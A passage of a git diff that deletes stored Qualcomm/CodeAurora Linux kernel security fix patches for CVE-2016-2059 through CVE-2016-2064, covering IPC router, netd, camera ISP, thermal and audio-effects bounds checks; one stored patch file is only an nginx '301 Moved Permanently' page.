-+++ b/lib/asn1_decoder.c
-@@ -210,9 +210,8 @@ next_op:
- 		unsigned char tmp;
- 
- 		/* Skip conditional matches if possible */
--		if ((op & ASN1_OP_MATCH__COND &&
--		     flags & FLAG_MATCHED) ||
--		    dp == datalen) {
-+		if ((op & ASN1_OP_MATCH__COND && flags & FLAG_MATCHED) ||
-+		    (op & ASN1_OP_MATCH__SKIP && dp == datalen)) {
- 			flags &= ~FLAG_LAST_MATCHED;
- 			pc += asn1_op_lengths[op];
- 			goto next_op;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2059/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2059/ANY/0001.patch
deleted file mode 100644
index 0394e128..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2059/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 9e8bdd63f7011dff5523ea435433834b3702398d Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
-Date: Mon, 22 Feb 2016 16:30:40 -0700
-Subject: net: ipc_router: Bind only a client port as control port
-
-IPC Router binds any port as a control port and moves it from the client
-port list to control port list. Misbehaving clients can exploit this
-incorrect behavior.
-
-IPC Router to check if the port is a client port before binding it as a
-control port.
-
-CRs-Fixed: 974577
-Change-Id: I9f189b76967d5f85750218a7cb6537d187a69663
-Signed-off-by: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
----
- net/ipc_router/ipc_router_core.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/ipc_router/ipc_router_core.c b/net/ipc_router/ipc_router_core.c
-index 99486e9..3100ebd 100644
---- a/net/ipc_router/ipc_router_core.c
-+++ b/net/ipc_router/ipc_router_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -3532,7 +3532,7 @@ int msm_ipc_router_get_curr_pkt_size(struct msm_ipc_port *port_ptr)
- 
- int msm_ipc_router_bind_control_port(struct msm_ipc_port *port_ptr)
- {
--	if (!port_ptr)
-+	if (unlikely(!port_ptr || port_ptr->type != CLIENT_PORT))
- 		return -EINVAL;
- 
- 	down_write(&local_ports_lock_lhc2);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2060/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2060/ANY/0001.patch
deleted file mode 100644
index bc3e6afc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2060/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From e9925f5acb4401588e23ea8a27c3e318f71b5cf8 Mon Sep 17 00:00:00 2001
-From: Bryse Flowers <bflowers@codeaurora.org>
-Date: Thu, 11 Feb 2016 12:20:37 -0800
-Subject: netd: Validate incoming upstream interface before adding
-
-Add isIfaceName check to addUpstreamInterface.
-
-Change-Id: Iacb5cb1ca6476765e5350b1cf3d822f4fcda32b8
-CRs-Fixed: 959631
----
- server/TetherController.cpp | 7 ++++---
- 1 file changed, 4 insertions(+), 3 deletions(-)
-
-diff --git a/server/TetherController.cpp b/server/TetherController.cpp
-index f6287c8..c4d6b83 100644
---- a/server/TetherController.cpp
-+++ b/server/TetherController.cpp
-@@ -482,9 +482,10 @@ int TetherController::addUpstreamInterface(char *iface)
- 
-     ALOGD("addUpstreamInterface(%s)\n", iface);
- 
--    if (!iface) {
--        ALOGE("addUpstreamInterface: received null interface");
--        return 0;
-+    if (!isIfaceName(iface)) {
-+        ALOGE("addUpstreamInterface: received invalid interface");
-+        errno = ENOENT;
-+        return -1;
-     }
-     for (it = mUpstreamInterfaces->begin(); it != mUpstreamInterfaces->end(); ++it) {
-         ALOGD(".");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2061/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2061/ANY/0001.patch
deleted file mode 100644
index f6306c84..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2061/ANY/0001.patch
+++ /dev/null
@@ -1,239 +0,0 @@
-From 79db14ca9f791a14be9376a0340ad3b9b9a4d603 Mon Sep 17 00:00:00 2001
-From: Jing Zhou <jzhou70@codeaurora.org>
-Date: Fri, 11 Mar 2016 17:30:50 -0800
-Subject: msm: camera: isp: Fix warning and errors based on static analysis
-
-This change fixes the warning/errors from static analysis
-
-CRs-fixed: 992942
-Change-Id: Iaf90ab4c1d17f903d03458d76cab1b4c0a5c8836
-Signed-off-by: Jing Zhou <jzhou70@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c   |  3 +--
- .../media/platform/msm/camera_v2/isp/msm_isp_axi_util.c  | 13 ++++++++-----
- .../platform/msm/camera_v2/isp/msm_isp_stats_util.c      |  5 ++---
- drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c  | 16 +++++++++-------
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c   | 14 +++++++-------
- 5 files changed, 27 insertions(+), 24 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-index b196934..3331f0d 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-@@ -85,6 +85,7 @@ struct msm_isp_bufq *msm_isp_get_bufq(
- 
- 	/* bufq_handle cannot be 0 */
- 	if ((bufq_handle == 0) ||
-+		bufq_index >= BUF_MGR_NUM_BUF_Q ||
- 		(bufq_index > buf_mgr->num_buf_q))
- 		return NULL;
- 
-@@ -1329,8 +1330,6 @@ static int msm_isp_buf_mgr_debug(struct msm_isp_buf_mgr *buf_mgr,
- 
- 	for (i = 0; i < BUF_MGR_NUM_BUF_Q; i++) {
- 		bufq = &buf_mgr->bufq[i];
--		if (!bufq)
--			continue;
- 
- 		spin_lock_irqsave(&bufq->bufq_lock, flags);
- 		if (!bufq->bufq_handle) {
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index 61cc9b9..c98b8ad 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -60,7 +60,7 @@ int msm_isp_axi_create_stream(struct vfe_device *vfe_dev,
- 	struct msm_vfe_axi_shared_data *axi_data,
- 	struct msm_vfe_axi_stream_request_cmd *stream_cfg_cmd)
- {
--	int i = stream_cfg_cmd->stream_src;
-+	uint32_t i = stream_cfg_cmd->stream_src;
- 
- 	if (i >= VFE_AXI_SRC_MAX) {
- 		pr_err("%s:%d invalid stream_src %d\n", __func__, __LINE__,
-@@ -1686,6 +1686,7 @@ static void msm_isp_handle_done_buf_frame_id_mismatch(
- 	struct msm_isp_event_data error_event;
- 	int ret = 0;
- 
-+	memset(&error_event, 0, sizeof(error_event));
- 	error_event.frame_id =
- 		vfe_dev->axi_data.src_info[VFE_PIX_0].frame_id;
- 	error_event.u.error_info.err_type =
-@@ -1709,7 +1710,7 @@ static int msm_isp_process_done_buf(struct vfe_device *vfe_dev,
- 	struct msm_vfe_axi_stream *stream_info, struct msm_isp_buffer *buf,
- 	struct timeval *time_stamp, uint32_t frame_id)
- {
--	int rc = 0, ret = 0;
-+	int rc;
- 	unsigned long flags;
- 	struct msm_isp_event_data buf_event;
- 	uint32_t stream_idx = HANDLE_TO_IDX(stream_info->stream_handle);
-@@ -1771,7 +1772,7 @@ static int msm_isp_process_done_buf(struct vfe_device *vfe_dev,
- 		if (rc == -EFAULT) {
- 			msm_isp_halt_send_error(vfe_dev,
- 					ISP_EVENT_BUF_FATAL_ERROR);
--			return ret;
-+			return rc;
- 		}
- 		if (!rc) {
- 			ISP_DBG("%s:%d vfe_id %d Buffer dropped %d\n",
-@@ -1827,7 +1828,7 @@ static int msm_isp_process_done_buf(struct vfe_device *vfe_dev,
- 		if (rc == -EFAULT) {
- 			msm_isp_halt_send_error(vfe_dev,
- 					ISP_EVENT_BUF_FATAL_ERROR);
--			return ret;
-+			return rc;
- 		}
- 	}
- 
-@@ -2406,7 +2407,8 @@ static int msm_isp_update_dual_HW_ms_info_at_stop(
- static int msm_isp_update_dual_HW_axi(struct vfe_device *vfe_dev,
- 			struct msm_vfe_axi_stream *stream_info)
- {
--	int rc = 0, vfe_id;
-+	int rc = 0;
-+	int vfe_id;
- 	uint32_t stream_idx = HANDLE_TO_IDX(stream_info->stream_handle);
- 	struct dual_vfe_resource *dual_vfe_res = NULL;
- 
-@@ -2871,6 +2873,7 @@ static int msm_isp_return_empty_buffer(struct vfe_device *vfe_dev,
- 		return rc;
- 	}
- 
-+	memset(&error_event, 0, sizeof(error_event));
- 	error_event.frame_id = frame_id;
- 	error_event.u.error_info.err_type = ISP_ERROR_RETURN_EMPTY_BUFFER;
- 	error_event.u.error_info.session_id = stream_info->session_id;
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index fe97f13..7eaffad 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -117,7 +117,7 @@ static int msm_isp_stats_cfg_ping_pong_address(struct vfe_device *vfe_dev,
- 					= buf;
- 			}
- 		}
--	} else if (!vfe_dev->is_split) {
-+	} else {
- 		if (buf)
- 			vfe_dev->hw_info->vfe_ops.stats_ops.
- 				update_ping_pong_addr(
-@@ -285,8 +285,7 @@ static int32_t msm_isp_stats_configure(struct vfe_device *vfe_dev,
- 		if (rc < 0) {
- 			pr_err("%s:%d failed: stats buf divert rc %d\n",
- 				__func__, __LINE__, rc);
--			if (0 == result)
--				result = rc;
-+			result = rc;
- 		}
- 	}
- 	if (is_composite && comp_stats_type_mask) {
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 4535d20..8a6c395e 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -944,6 +944,7 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd,
- 	unsigned int cmd, void *arg)
- {
- 	long rc = 0;
-+	long rc2 = 0;
- 	struct vfe_device *vfe_dev = v4l2_get_subdevdata(sd);
- 
- 	if (!vfe_dev || !vfe_dev->vfe_base) {
-@@ -1023,7 +1024,9 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd,
- 		if (atomic_read(&vfe_dev->error_info.overflow_state)
- 			!= HALT_ENFORCED) {
- 			rc = msm_isp_stats_reset(vfe_dev);
--			rc |= msm_isp_axi_reset(vfe_dev, arg);
-+			rc2 = msm_isp_axi_reset(vfe_dev, arg);
-+			if (!rc && rc2)
-+				rc = rc2;
- 		} else {
- 			pr_err_ratelimited("%s: no HW reset, halt enforced.\n",
- 				__func__);
-@@ -1035,7 +1038,9 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd,
- 		if (atomic_read(&vfe_dev->error_info.overflow_state)
- 			!= HALT_ENFORCED) {
- 			rc = msm_isp_stats_restart(vfe_dev);
--			rc |= msm_isp_axi_restart(vfe_dev, arg);
-+			rc2 = msm_isp_axi_restart(vfe_dev, arg);
-+			if (!rc && rc2)
-+				rc = rc2;
- 		} else {
- 			pr_err_ratelimited("%s: no AXI restart, halt enforced.\n",
- 				__func__);
-@@ -1822,8 +1827,6 @@ void msm_isp_update_error_frame_count(struct vfe_device *vfe_dev)
- {
- 	struct msm_vfe_error_info *error_info = &vfe_dev->error_info;
- 	error_info->info_dump_frame_count++;
--	if (error_info->info_dump_frame_count == 0)
--		error_info->info_dump_frame_count++;
- }
- 
- 
-@@ -1922,6 +1925,7 @@ static void msm_isp_process_overflow_irq(
- 
- 		if (atomic_read(&vfe_dev->error_info.overflow_state)
- 			!= HALT_ENFORCED) {
-+			memset(&error_event, 0, sizeof(error_event));
- 			error_event.frame_id =
- 				vfe_dev->axi_data.src_info[VFE_PIX_0].frame_id;
- 			error_event.u.error_info.err_type =
-@@ -1939,10 +1943,8 @@ void msm_isp_reset_burst_count_and_frame_drop(
- 		stream_info->stream_type != BURST_STREAM) {
- 		return;
- 	}
--	if (stream_info->stream_type == BURST_STREAM &&
--		stream_info->num_burst_capture != 0) {
-+	if (stream_info->num_burst_capture != 0)
- 		msm_isp_reset_framedrop(vfe_dev, stream_info);
--	}
- }
- 
- static void msm_isp_enqueue_tasklet_cmd(struct vfe_device *vfe_dev,
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index dc6af17..640379d 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -467,23 +467,23 @@ static void msm_ispif_sel_csid_core(struct ispif_device *ispif,
- 	switch (intftype) {
- 	case PIX0:
- 		data &= ~(BIT(1) | BIT(0));
--		data |= csid;
-+		data |= (uint32_t) csid;
- 		break;
- 	case RDI0:
- 		data &= ~(BIT(5) | BIT(4));
--		data |= (csid << 4);
-+		data |= ((uint32_t) csid) << 4;
- 		break;
- 	case PIX1:
- 		data &= ~(BIT(9) | BIT(8));
--		data |= (csid << 8);
-+		data |= ((uint32_t) csid) << 8;
- 		break;
- 	case RDI1:
- 		data &= ~(BIT(13) | BIT(12));
--		data |= (csid << 12);
-+		data |= ((uint32_t) csid) << 12;
- 		break;
- 	case RDI2:
- 		data &= ~(BIT(21) | BIT(20));
--		data |= (csid << 20);
-+		data |= ((uint32_t) csid) << 20;
- 		break;
- 	}
- 
-@@ -559,9 +559,9 @@ static void msm_ispif_enable_intf_cids(struct ispif_device *ispif,
- 
- 	data = msm_camera_io_r(ispif->base + intf_addr);
- 	if (enable)
--		data |= cid_mask;
-+		data |=  (uint32_t) cid_mask;
- 	else
--		data &= ~cid_mask;
-+		data &= ~((uint32_t) cid_mask);
- 	msm_camera_io_w_mb(data, ispif->base + intf_addr);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2062/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2062/ANY/0001.patch
deleted file mode 100644
index 2b9584e6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2062/ANY/0001.patch
+++ /dev/null
@@ -1,7 +0,0 @@
-<html>
-<head><title>301 Moved Permanently</title></head>
-<body bgcolor="white">
-<center><h1>301 Moved Permanently</h1></center>
-<hr><center>nginx/1.12.1</center>
-</body>
-</html>
diff --git a/Patches/Linux_CVEs/CVE-2016-2063/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2063/ANY/0001.patch
deleted file mode 100644
index 24f90187..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2063/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From ab3f46119ca10de87a11fe966b0723c48f27acd4 Mon Sep 17 00:00:00 2001
-From: Manaf Meethalavalappu Pallikunhi <manafm@codeaurora.org>
-Date: Wed, 30 Mar 2016 17:12:16 +0530
-Subject: msm: limits: Check user buffer size before copying to local buffer
-
-User input data is passed in from userspace through debugfs interface
-of supply lm core to validate supply lm core functionality. Ensure
-user buffer size is not greater than expected stack buffer size
-to avoid out of bounds array accesses.
-
-Change-Id: I5a93774855241b50895c5e2b3ff939e4c33a0185
-Signed-off-by: Manaf Meethalavalappu Pallikunhi <manafm@codeaurora.org>
----
- drivers/thermal/supply_lm_core.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/supply_lm_core.c b/drivers/thermal/supply_lm_core.c
-index fc8e807..a4d137f 100644
---- a/drivers/thermal/supply_lm_core.c
-+++ b/drivers/thermal/supply_lm_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -303,6 +303,11 @@ static ssize_t supply_lm_input_write(struct file *fp,
- 	enum corner_state gpu;
- 	enum corner_state modem;
- 
-+	if (count > (MODE_MAX - 1)) {
-+		pr_err("Invalid user input\n");
-+		return -EINVAL;
-+	}
-+
- 	if (copy_from_user(&buf, user_buffer, count))
- 		return -EFAULT;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2064/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2064/ANY/0001.patch
deleted file mode 100644
index 06b77eb4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2064/ANY/0001.patch
+++ /dev/null
@@ -1,1511 +0,0 @@
-From 775fca8289eff931f91ff6e8c36cf2034ba59e88 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang <wjiang@codeaurora.org>
-Date: Wed, 16 Mar 2016 12:51:03 +0800
-Subject: ASoC: msm: audio-effects: fix stack overread and heap overwrite
-
-Fix overwrite of updt_params allocated in heap, and stack overread
-where param pointer is passed from user space.
-
-CRs-Fixed: 989628
-Change-Id: Ida8bdb7da2fcb97023dce3b6eafe4b899a51cb66
-Signed-off-by: Weiyin Jiang <wjiang@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c |   3 +-
- include/sound/msm-audio-effects-q6-v2.h         |   4 +-
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 835 +++++++++++++++++-------
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c      |   2 +-
- 4 files changed, 588 insertions(+), 256 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..3ba20ca 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -20,7 +20,6 @@
- #include <sound/msm-dts-eagle.h>
- 
- #define MAX_CHANNELS_SUPPORTED		8
--#define MAX_PP_PARAMS_SZ		128
- #define WAIT_TIMEDOUT_DURATION_SECS	1
- 
- struct q6audio_effects {
-diff --git a/include/sound/msm-audio-effects-q6-v2.h b/include/sound/msm-audio-effects-q6-v2.h
-index cbdea32..6bc2338 100644
---- a/include/sound/msm-audio-effects-q6-v2.h
-+++ b/include/sound/msm-audio-effects-q6-v2.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -16,6 +16,8 @@
- 
- #include <sound/audio_effects.h>
- 
-+#define MAX_PP_PARAMS_SZ   128
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- 						int topology);
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index e26c453..1c08842 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,24 @@
- 
- #define MAX_ENABLE_CMD_SIZE 32
- 
-+#define GET_NEXT(ptr, upper_limit, rc)                                  \
-+({                                                                      \
-+	if (((ptr) + 1) > (upper_limit)) {                              \
-+		pr_err("%s: param list out of boundary\n", __func__);   \
-+		(rc) = -EINVAL;                                         \
-+	}                                                               \
-+	((rc) == 0) ? *(ptr)++ :  -EINVAL;                              \
-+})
-+
-+#define CHECK_PARAM_LEN(len, max_len, tag, rc)                          \
-+do {                                                                    \
-+	if ((len) > (max_len)) {                                        \
-+		pr_err("%s: params length overflows\n", (tag));         \
-+		(rc) = -EINVAL;                                         \
-+	}                                                               \
-+} while (0)
-+
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- 						int topology)
- {
-@@ -109,15 +127,16 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				struct virtualizer_params *virtualizer,
- 				long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -130,10 +149,14 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case VIRTUALIZER_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -142,17 +165,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = virtualizer->enable_flag;
--			virtualizer->enable_flag = *values++;
-+			virtualizer->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:VIRT ENABLE prev:%d, new:%d\n", __func__,
- 				prev_enable_flag, virtualizer->enable_flag);
- 			if (prev_enable_flag != virtualizer->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
--				*updt_params++ =
--					AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
--				*updt_params++ = VIRTUALIZER_ENABLE_PARAM_SZ;
--				*updt_params++ = virtualizer->enable_flag;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					VIRTUALIZER_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_VIRTUALIZER;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-+				*updt_params++ =
-+				VIRTUALIZER_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+				virtualizer->enable_flag;
- 			}
- 			break;
- 		case VIRTUALIZER_STRENGTH:
-@@ -161,17 +193,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->strength = *values++;
-+			virtualizer->strength =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT STRENGTH val: %d\n",
- 					__func__, virtualizer->strength);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					VIRTUALIZER_STRENGTH_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT STRENGTH", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_VIRTUALIZER_STRENGTH;
--				*updt_params++ = VIRTUALIZER_STRENGTH_PARAM_SZ;
--				*updt_params++ = virtualizer->strength;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					VIRTUALIZER_STRENGTH_PARAM_SZ;
-+				*updt_params++ =
-+					virtualizer->strength;
- 			}
- 			break;
- 		case VIRTUALIZER_OUT_TYPE:
-@@ -180,17 +221,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->out_type = *values++;
-+			virtualizer->out_type =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT OUT_TYPE val:%d\n",
- 				__func__, virtualizer->out_type);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT OUT_TYPE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_VIRTUALIZER_OUT_TYPE;
--				*updt_params++ = VIRTUALIZER_OUT_TYPE_PARAM_SZ;
--				*updt_params++ = virtualizer->out_type;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+				*updt_params++ =
-+					virtualizer->out_type;
- 			}
- 			break;
- 		case VIRTUALIZER_GAIN_ADJUST:
-@@ -199,18 +249,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->gain_adjust = *values++;
-+			virtualizer->gain_adjust =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT GAIN_ADJUST val:%d\n",
- 				__func__, virtualizer->gain_adjust);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
--				*updt_params++ =
--				       AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
--				*updt_params++ =
--					VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
--				*updt_params++ = virtualizer->gain_adjust;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT GAIN_ADJUST", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_VIRTUALIZER;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
-+				*updt_params++ =
-+				VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+				*updt_params++ =
-+				virtualizer->gain_adjust;
- 			}
- 			break;
- 		default:
-@@ -218,7 +276,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -232,15 +290,16 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				     struct reverb_params *reverb,
- 				     long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -253,10 +312,14 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
